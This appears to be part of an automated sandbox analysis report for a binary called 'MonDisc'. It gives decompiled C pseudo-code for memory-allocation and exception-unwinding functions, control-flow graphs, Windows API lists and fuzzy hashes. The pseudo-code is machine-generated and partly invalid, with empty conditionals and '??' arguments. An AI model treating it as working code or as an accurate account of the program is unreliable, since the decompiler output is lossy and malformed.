6715->6705 6716->6715 6717->6701 6717->6714 6718->6696
                              C-Code - Quality: 52%
                              			E00007FF67FF62C914230(void* __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
				long _t51;
				signed int _t52;
				void* _t54;
				void* _t61;
				void* _t76;
				void* _t88;
				intOrPtr* _t89;
				signed long long _t93;
				long long _t95;
				long long* _t96;
				void* _t99;
				intOrPtr* _t105;
				intOrPtr _t106;
				long long _t108;
				intOrPtr _t111;
				void* _t116;
				signed long long _t119;
				signed long long _t121;
				signed long long _t122;
				long long _t130;
				void* _t134;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t142;
				long _t143;
				long _t147;
				signed long long _t148;
				void* _t150;
				signed long long _t152;
				void* _t153;
				signed long long _t155;

				 *((long long*)(_t134 + 8)) = __rbx;
				 *((long long*)(_t134 + 0x10)) = _t130;
				 *((long long*)(_t134 + 0x18)) = __rsi;
				 *((long long*)(_t134 + 0x20)) = __rdi;
				r14d = 0;
				if (__rdx - 0x20000 < 0) goto 0x2c9142fd;
				_t152 = __rdx + 0x00020036 & 0xfffe0000;
				if (_t152 - __rdx <= 0) goto 0x2c9142fd;
				GetLastError();
				r9d = 4;
				r8d = 0x103000;
				VirtualAlloc(_t150, _t147);
				SetLastError(_t143);
				_t103 =  !=  ? __rax : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c9142fd;
				if (0xffffffff != 0xffffffff) goto 0x2c9142c3;
				goto 0x2c9142c9;
				_t104 = ( !=  ? __rax : 0xffffffff) + 0xffffffff;
				_t153 = _t152 - 0xffffffff;
				 *0xffffffff = 0xbadbad;
				 *0x00000007 = _t153 - 0x00000020 | 0x00000002;
				_t9 = _t104 + 0x10; // 0x10000000f
				_t88 = _t9;
				 *((long long*)(0xffffffff + _t153 - 0x18)) = 0xb;
				 *(( !=  ? __rax : 0xffffffff) + 0xffffffff + _t153 - 0x10) = _t147;
				if (_t88 != 0) goto 0x2c91445d;
				_t155 = __rdx + 0x00020040 & 0xfffe0000;
				if (_t155 - __rdx <= 0) goto 0x2c91445b;
				_t51 = GetLastError();
				r9d = 4;
				r8d = 0x3000;
				_t52 = VirtualAlloc(??, ??, ??, ??); // executed
				_t99 = _t88;
				SetLastError(??);
				_t145 =  !=  ? _t99 : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c91445b;
				_t89 = __rcx + 0x348;
				_t105 = _t89;
				if (_t89 == 0) goto 0x2c914404;
				asm("o16 nop [eax+eax]");
				_t140 =  *((intOrPtr*)(_t105 + 8));
				_t137 =  *_t105;
				_t116 = _t137 + _t140;
				if (0xffffffff == _t116) goto 0x2c91438b;
				_t106 =  *((intOrPtr*)(_t105 + 0x10));
				if (_t106 != 0) goto 0x2c914370;
				goto 0x2c9143ef;
				_t142 =  *((intOrPtr*)(__rcx + 0x20));
				if (_t142 - _t137 < 0) goto 0x2c9143ea;
				_t76 = _t142 - _t116;
				if (_t76 >= 0) goto 0x2c9143ea;
				 *((long long*)(_t106 + 8)) = _t140 + _t155;
				if (_t76 == 0) goto 0x2c9143be;
				r14d = _t52 & 0x00000007;
				_t148 =  ~_t147;
				r14d = r14d & 0x00000007;
				_t119 =  *(__rcx + 0x10) + _t155 - _t148;
				_t108 =  *((intOrPtr*)(__rcx + 0x20)) + _t148;
				 *((long long*)(__rcx + 0x20)) = _t108;
				 *(__rcx + 0x10) = _t119;
				_t93 = _t119 | 0x00000001;
				 *(_t108 + 8) = _t93;
				 *((long long*)(_t108 + _t119 + 8)) = 0x40;
				 *((long long*)(__rcx + 0x28)) = 0x200000;
				goto 0x2c914412;
				if (_t93 == 0) goto 0x2c914404;
				if ( *_t93 == 0xffffffff + _t155) goto 0x2c914444;
				if ( *((intOrPtr*)(_t93 + 0x10)) != 0) goto 0x2c9143f3;
				_t54 = E00007FF67FF62C913F80(_t52 & 0x00000007, _t51, _t61, _t99, __rcx, 0xffffffff, __rdi, __rcx, __rdx, _t155);
				_t121 =  *(__rcx + 0x10);
				if (__rdx - _t121 >= 0) goto 0x2c91445b;
				_t111 =  *((intOrPtr*)(__rcx + 0x20));
				_t122 = _t121 - __rdx;
				 *(__rcx + 0x10) = _t122;
				_t95 = _t111 + __rdx;
				 *((long long*)(__rcx + 0x20)) = _t95;
				 *(_t95 + 8) = _t122 | 0x00000001;
				_t96 = _t111 + 0x10;
				 *(_t111 + 8) = __rdx | 0x00000003;
				goto 0x2c91445d;
				 *((intOrPtr*)(_t96 + 8)) =  *((intOrPtr*)(_t96 + 8)) + _t155;
				 *_t96 =  !=  ? _t99 : 0xffffffff;
				E00007FF67FF62C915690(_t54, __rdx - _t121, __rcx, 0xffffffff, _t155, __rdx | 0x00000003);
				goto 0x2c91445d;
				return 0;
			}


































                              0x7ff62c914230
                              0x7ff62c914235
                              0x7ff62c91423a
                              0x7ff62c91423f
                              0x7ff62c91424e
                              0x7ff62c914265
                              0x7ff62c914272
                              0x7ff62c91427c
                              0x7ff62c91427e
                              0x7ff62c914284
                              0x7ff62c914289
                              0x7ff62c914296
                              0x7ff62c9142a1
                              0x7ff62c9142ad
                              0x7ff62c9142b4
                              0x7ff62c9142bc
                              0x7ff62c9142c1
                              0x7ff62c9142c9
                              0x7ff62c9142cc
                              0x7ff62c9142d3
                              0x7ff62c9142de
                              0x7ff62c9142e2
                              0x7ff62c9142e2
                              0x7ff62c9142e6
                              0x7ff62c9142ef
                              0x7ff62c9142f7
                              0x7ff62c914304
                              0x7ff62c91430e
                              0x7ff62c914314
                              0x7ff62c91431a
                              0x7ff62c914320
                              0x7ff62c91432d
                              0x7ff62c914335
                              0x7ff62c914338
                              0x7ff62c914341
                              0x7ff62c914349
                              0x7ff62c91434f
                              0x7ff62c914356
                              0x7ff62c91435c
                              0x7ff62c914366
                              0x7ff62c914370
                              0x7ff62c914374
                              0x7ff62c914377
                              0x7ff62c91437e
                              0x7ff62c914380
                              0x7ff62c914387
                              0x7ff62c914389
                              0x7ff62c91438b
                              0x7ff62c914392
                              0x7ff62c914394
                              0x7ff62c914397
                              0x7ff62c91439d
                              0x7ff62c9143b2
                              0x7ff62c9143b4
                              0x7ff62c9143b7
                              0x7ff62c9143ba
                              0x7ff62c9143be
                              0x7ff62c9143c1
                              0x7ff62c9143c4
                              0x7ff62c9143cb
                              0x7ff62c9143cf
                              0x7ff62c9143d3
                              0x7ff62c9143d7
                              0x7ff62c9143e0
                              0x7ff62c9143e8
                              0x7ff62c9143ed
                              0x7ff62c9143f9
                              0x7ff62c914402
                              0x7ff62c91440d
                              0x7ff62c914412
                              0x7ff62c914419
                              0x7ff62c91441b
                              0x7ff62c91441f
                              0x7ff62c914422
                              0x7ff62c91442a
                              0x7ff62c914432
                              0x7ff62c914436
                              0x7ff62c91443a
                              0x7ff62c91443e
                              0x7ff62c914442
                              0x7ff62c914444
                              0x7ff62c91444e
                              0x7ff62c914454
                              0x7ff62c914459
                              0x7ff62c91447b

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction ID: 11ca606a2b89079650a6a545d82144bd12ba7e94f9946d88472e9e1ee43a09ca
                              • Opcode Fuzzy Hash: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction Fuzzy Hash: AB51B372B09B8182EE24CB19E84537972A8FB49BA4F584A35CA6E877D1DF7CD442C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B4F0 Relevance: 6.1, APIs: 4, Instructions: 80memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6721 7ff62c93b4f0-7ff62c93b503 6722 7ff62c93b57e-7ff62c93b588 6721->6722 6723 7ff62c93b505-7ff62c93b50f 6721->6723 6724 7ff62c93b58a-7ff62c93b598 6722->6724 6725 7ff62c93b5d3-7ff62c93b5d9 6722->6725 6726 7ff62c93b551-7ff62c93b56b VirtualProtect 6723->6726 6727 7ff62c93b511-7ff62c93b518 6723->6727 6724->6725 6728 7ff62c93b59a-7ff62c93b5a1 6724->6728 6725->6725 6729 7ff62c93b5db-7ff62c93b5e6 6725->6729 6731 7ff62c93b571-7ff62c93b57d 6726->6731 6732 7ff62c93b600-7ff62c93b608 call 7ff62c93b9d0 6726->6732 6730 7ff62c93b51a-7ff62c93b534 VirtualProtect 6727->6730 6727->6731 6733 7ff62c93b5c5-7ff62c93b5d2 6728->6733 6734 7ff62c93b5a3-7ff62c93b5b9 VirtualProtect 6728->6734 6729->6725 6735 7ff62c93b5e8-7ff62c93b5fe VirtualProtect 6729->6735 6730->6732 6737 7ff62c93b53a-7ff62c93b550 6730->6737 6734->6732 6738 7ff62c93b5bb 6734->6738 6735->6732 6735->6733 6738->6733
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction ID: 0d8cc644f4d458320fa0c555a007c9d90534fc4d1b70c6243e90ab8fc1409a19
                              • Opcode Fuzzy Hash: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction Fuzzy Hash: 45218F62F1C98681EF54DF26E8447E92360FB04B98F480036CB0D87656DF79D994C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914AC0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6740 7ff62c914ac0-7ff62c914ad0 6741 7ff62c914ad6-7ff62c914ae0 6740->6741 6742 7ff62c914b79-7ff62c914b7e 6740->6742 6743 7ff62c914ae5-7ff62c914afb GetLastError 6741->6743 6744 7ff62c914b59-7ff62c914b5b SetLastError 6743->6744 6745 7ff62c914afd 6743->6745 6746 7ff62c914b61-7ff62c914b64 6744->6746 6747 7ff62c914b00-7ff62c914b17 VirtualQuery 6745->6747 6746->6743 6748 7ff62c914b6a-7ff62c914b74 6746->6748 6747->6746 6749 7ff62c914b19-7ff62c914b1e 6747->6749 6748->6742 6749->6746 6750 7ff62c914b20-7ff62c914b25 6749->6750 6750->6746 6751 7ff62c914b27-7ff62c914b2f 6750->6751 6751->6746 6752 7ff62c914b31-7ff62c914b36 6751->6752 6752->6746 6753 7ff62c914b38-7ff62c914b4b VirtualFree 6752->6753 6753->6746 6754 7ff62c914b4d-7ff62c914b57 6753->6754 6754->6744 6754->6747
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction ID: 03c873749e82fd4813b673589fe114e3785e648865514e48ee6eddcc99b3694b
                              • Opcode Fuzzy Hash: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction Fuzzy Hash: 58116D31E48B8182EF619F15B80132DB3A8FB89BA1F480035EA8D97B59CF7CE541CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C901990 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6755 7ff62c901990-7ff62c9019bb call 7ff62c900c60 6758 7ff62c9019c2-7ff62c9019d7 call 7ff62c985328 6755->6758 6759 7ff62c9019bd 6755->6759 6763 7ff62c9019df-7ff62c901a2a call 7ff62c901990 6758->6763 6764 7ff62c9019d9-7ff62c9019de call 7ff62c9017a0 6758->6764 6759->6758 6769 7ff62c901a31-7ff62c901a35 6763->6769 6770 7ff62c901a2c 6763->6770 6764->6763 6771 7ff62c901a47-7ff62c901a5b 6769->6771 6772 7ff62c901a37-7ff62c901a42 call 7ff62c900dc0 6769->6772 6770->6769 6774 7ff62c901ae3 6771->6774 6775 7ff62c901a61-7ff62c901a7c 6771->6775 6781 7ff62c901b8d-7ff62c901ba4 6772->6781 6776 7ff62c901ae6-7ff62c901ae9 6774->6776 6782 7ff62c901a7e-7ff62c901a8a 6775->6782 6783 7ff62c901a8c-7ff62c901a97 6775->6783 6779 7ff62c901aef-7ff62c901af6 6776->6779 6780 7ff62c901b88 6776->6780 6784 7ff62c901b12-7ff62c901b4d call 7ff62c974f70 call 7ff62c901970 6779->6784 6785 7ff62c901af8-7ff62c901aff 6779->6785 6780->6781 6782->6776 6782->6783 6783->6774 6786 7ff62c901a99-7ff62c901aaa 6783->6786 6789 7ff62c901b52-7ff62c901b56 6784->6789 6785->6784 6787 7ff62c901b01-7ff62c901b08 6785->6787 6786->6774 6787->6789 6790 7ff62c901b0a 6787->6790 6793 7ff62c901b64 6789->6793 6794 7ff62c901b58-7ff62c901b62 6789->6794 6790->6780 6796 7ff62c901b6b-7ff62c901b82 RtlUnwindEx 6793->6796 6794->6793 6794->6796 6796->6780
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID: CCG $csm
                              • API String ID: 3115360832-2763669848
                              • Opcode ID: 5c106786abd1ca784610bfdf5277bef85e973f650f6fddc9046c55bcd675574e
                              • Instruction ID: ffe2a00263b1d474027954ae1cabb6c005b3f42586d3212f8becede02d996e0a
                              • Opcode Fuzzy Hash: 5c106786abd1ca784610bfdf5277bef85e973f650f6fddc9046c55bcd675574e
                              • Instruction Fuzzy Hash: ED41DE22F08B4582EE249B16EC0537A67A1FB44FF4F544132EE5D87BAADE3CE4418742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914990 Relevance: 3.8, APIs: 3, Instructions: 73memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E00007FF67FF62C914990(signed long long __rax, long long __rbx, long long __rsi) {
				void* _t23;
				void* _t24;
				signed int _t25;
				signed long long _t46;
				signed long long _t47;
				void* _t49;
				void* _t57;
				long long _t58;
				long _t59;
				void* _t61;
				long long _t70;
				void* _t72;
				void* _t74;
				void* _t75;
				void* _t77;

				 *((long long*)(_t74 + 0x18)) = __rbx;
				_t75 = _t74 - 0x20;
				GetLastError();
				r8d = 0x3000;
				_t2 = _t49 + 4; // 0x4, executed
				r9d = _t2;
				_t23 = VirtualAlloc(??, ??, ??, ??); // executed
				_t46 = __rax;
				SetLastError(_t59);
				_t61 =  !=  ? __rax : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c914aa7;
				 *((long long*)(_t75 + 0x30)) = _t70;
				 *((long long*)(_t75 + 0x38)) = __rsi;
				if (0xffffffff != 0xffffffff) goto 0x2c9149f4;
				goto 0x2c9149fa;
				_t5 = _t61 + 0x10; // 0x10000000f
				_t72 = _t5 + 0xffffffff;
				r8d = 0x370;
				_t24 = E00007FF67FF62C974DE0(_t23, 0, _t72, _t77);
				 *0x00BADBB4 = 0x373;
				 *((long long*)(_t72 + 0x348)) = 0xffffffff;
				 *((long long*)(_t72 + 0x350)) = 0x20000;
				 *((long long*)(_t72 + 0x30)) = 0xff;
				_t25 = E00007FF67FF62C914770(_t24, _t72);
				_t12 = _t72 - 0x10; // 0xffffffff
				_t57 = _t12 + ( *(_t72 - 8) & 0xfffffffc);
				if (0xffffffff == 0xffffffff) goto 0x2c914a6a;
				_t47 =  ~_t46;
				_t58 = _t57 + _t47;
				 *((long long*)(_t72 + 0x20)) = _t58;
				 *((long long*)(_t72 + 0x10)) = 0xffffffff;
				 *((long long*)(_t58 + 8)) = 0xffffffffffffffff;
				 *((long long*)(_t58 + _t61 - _t57 + 0x1ffc0 - _t47 + 8)) = 0x40;
				 *((long long*)(_t72 + 0x28)) = 0x200000;
				return _t25 & 0x00000007;
			}


















                              0x7ff62c914990
                              0x7ff62c914996
                              0x7ff62c91499a
                              0x7ff62c9149a7
                              0x7ff62c9149af
                              0x7ff62c9149af
                              0x7ff62c9149b3
                              0x7ff62c9149bb
                              0x7ff62c9149be
                              0x7ff62c9149ce
                              0x7ff62c9149d6
                              0x7ff62c9149dc
                              0x7ff62c9149e3
                              0x7ff62c9149ee
                              0x7ff62c9149f2
                              0x7ff62c9149fa
                              0x7ff62c914a00
                              0x7ff62c914a03
                              0x7ff62c914a0c
                              0x7ff62c914a11
                              0x7ff62c914a1d
                              0x7ff62c914a24
                              0x7ff62c914a2f
                              0x7ff62c914a37
                              0x7ff62c914a40
                              0x7ff62c914a4d
                              0x7ff62c914a60
                              0x7ff62c914a64
                              0x7ff62c914a6d
                              0x7ff62c914a70
                              0x7ff62c914a77
                              0x7ff62c914a82
                              0x7ff62c914a86
                              0x7ff62c914a8f
                              0x7ff62c914aa6

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction ID: c175c5e3c6a898471cc0f5b104a3f4c4e37390bca64c5593f9fd4b382e3d1c30
                              • Opcode Fuzzy Hash: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction Fuzzy Hash: 3721C072F14A8086EB148F25ED8436972A5EB49BB8F584334DA7D4BADACF3CD5458300
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B370 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction ID: 911960bf5f3841d46f036ad3088780c6cb09b86980ab0f570b5e04740f628160
                              • Opcode Fuzzy Hash: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction Fuzzy Hash: 68E09261E1A68681EF14DB62E8587EC3390EB14B5CF1C0036DA1C4B752CF39C0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FF020 Relevance: 2.6, APIs: 2, Instructions: 129COMMON
                              Download Yara Rule
                              C-Code - Quality: 66%
                              			E00007FF67FF62C8FF020(void* __ebx, intOrPtr* __rax, signed long long __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __r14, long long __r15) {
				long _t56;
				void* _t59;
				signed int _t66;
				void* _t75;
				void* _t77;
				intOrPtr* _t110;
				signed long long _t112;
				signed long long _t115;
				intOrPtr _t116;
				long long _t126;
				void* _t132;
				long long _t140;
				signed long long _t142;
				void* _t144;
				void* _t146;
				intOrPtr _t149;

				 *((long long*)(_t144 + 0x50)) = _t140;
				_t112 = __rcx;
				 *((long long*)(_t144 + 0x58)) = __rsi;
				 *((long long*)(_t144 + 0x60)) = __rdi;
				 *((long long*)(_t144 + 0x28)) = __r14;
				 *((long long*)(_t144 + 0x20)) = __r15;
				E00007FF67FF62C984D84(__rax);
				r12d =  *__rax;
				_t56 = GetLastError();
				_t130 =  *((intOrPtr*)(__rcx + 0x20));
				r13d = _t56;
				_t149 =  *((intOrPtr*)(__rcx + 0x10));
				_t115 =  *( *((intOrPtr*)(__rcx + 0x20)) - 0x10) & 0xffffffff;
				_t146 = _t149 + 0x2d8;
				if ( *((char*)(_t115 + 0xa)) != 0) goto 0x2c8ff0ca;
				_t116 =  *((intOrPtr*)(_t115 + 0x20));
				if (( *(_t116 - 0x2b) & 0x00000002) == 0) goto 0x2c8ff0a4;
				if ( *((intOrPtr*)(__rcx + 0x30)) -  *(__rcx + 0x28) -  *(__rcx + 0x28) << 3 > 0) goto 0x2c8ff0be;
				E00007FF67FF62C8FB470(__rcx,  *((intOrPtr*)(__rcx + 0x20)));
				_t77 =  >=  ? ( *(_t116 - 0x5e) & 0x000000ff) - _t75 : 0;
				goto 0x2c8ff0e9;
				if ( *((intOrPtr*)(_t112 + 0x30)) -  *((intOrPtr*)(_t112 + 0x28)) - 0xa0 > 0) goto 0x2c8ff0e7;
				_t59 = E00007FF67FF62C8FB470(_t112, _t130);
				 *(_t146 + 0x80) = _t112;
				if ((bpl & 0x00000001) == 0) goto 0x2c8ff111;
				_t142 = __rdx & 0xfffffffe;
				E00007FF67FF62C910630();
				goto 0x2c8ff1a6;
				if ( *((intOrPtr*)(_t146 + 0xec)) == 0) goto 0x2c8ff131;
				if (( *(_t149 + 0x91) & 0x00000060) != 0) goto 0x2c8ff131;
				_t132 = _t142 - 4;
				E00007FF67FF62C910750(_t59, _t146, _t132); // executed
				if (( *(_t149 + 0x91) & 0x00000001) == 0) goto 0x2c8ff1a6;
				if (0 <= 0) goto 0x2c8ff166;
				 *((long long*)( *((intOrPtr*)(_t112 + 0x28)))) = 0xffffffff;
				 *((long long*)(_t112 + 0x28)) =  *((long long*)(_t112 + 0x28)) + 8;
				if (0 != 0) goto 0x2c8ff150;
				_t37 = _t132 - 1; // -1
				r8d = _t37;
				E00007FF67FF62C8FEEA0(_t112, _t132);
				if (0 <= 0) goto 0x2c8ff1a6;
				_t126 =  *((intOrPtr*)(_t112 + 0x28)) + 0xfffffff8;
				if ( *_t126 != 0xffffffff) goto 0x2c8ff1a6;
				 *((long long*)(_t112 + 0x28)) = _t126;
				_t110 = _t146 + 0xec;
				if (0xffffffffffffffff > 0) goto 0x2c8ff180;
				_t66 =  *(_t142 - 4) & 0x000000ff;
				if (( *(_t146 + 0xa8) & 0x00000001) == 0) goto 0x2c8ff1d4;
				if ( *_t110 == 0) goto 0x2c8ff1e0;
				if (_t66 == 0x59) goto 0x2c8ff1de;
				if (_t66 != 0x5c) goto 0x2c8ff1e0;
				E00007FF67FF62C984D84(_t110);
				 *_t110 = r12d;
				SetLastError(??);
				return  *(0x2ca0b8a0 + _t112 * 2) & 0x0000ffff;
			}



















                              0x7ff62c8ff02a
                              0x7ff62c8ff02f
